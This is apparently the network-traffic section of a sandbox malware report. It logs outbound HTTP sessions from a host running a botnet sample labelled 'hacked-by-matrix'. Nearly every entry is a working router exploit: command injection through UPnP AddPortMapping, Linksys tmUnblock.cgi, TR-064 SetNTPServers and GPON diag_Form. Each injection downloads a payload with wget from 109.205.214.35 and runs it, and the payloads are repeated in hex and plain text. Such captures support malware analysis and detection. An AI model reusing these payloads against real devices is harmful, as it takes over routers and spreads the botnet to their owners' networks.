                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:22:38.512976885 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:22:44.652246952 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:22:56.685590982 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:22.540251970 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        532192.168.2.1347068172.65.80.13355555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.506027937 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        533192.168.2.135089495.78.67.1547547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.518280029 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:35.735785961 CET197INHTTP/1.1 404 Not Found
                                                        Date: Thu Mar 21 11:22:34 2024
                                                        Server: tr069 http server
                                                        Content-Length: 15
                                                        Connection: close
                                                        Content-Type: text/plain; charset=ISO-8859-1
                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: File not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        534192.168.2.13369925.138.163.245443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.568211079 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        535192.168.2.1348940212.79.22.73443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.568227053 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        536192.168.2.135064242.238.192.21443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.568408012 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        537192.168.2.1347604118.47.103.174443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.568408966 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        538192.168.2.135620442.149.100.200443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.568430901 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        539192.168.2.1345536118.13.169.254443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.568460941 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        540192.168.2.136024842.21.91.194443
                                                        TimestampBytes transferredDirectionData
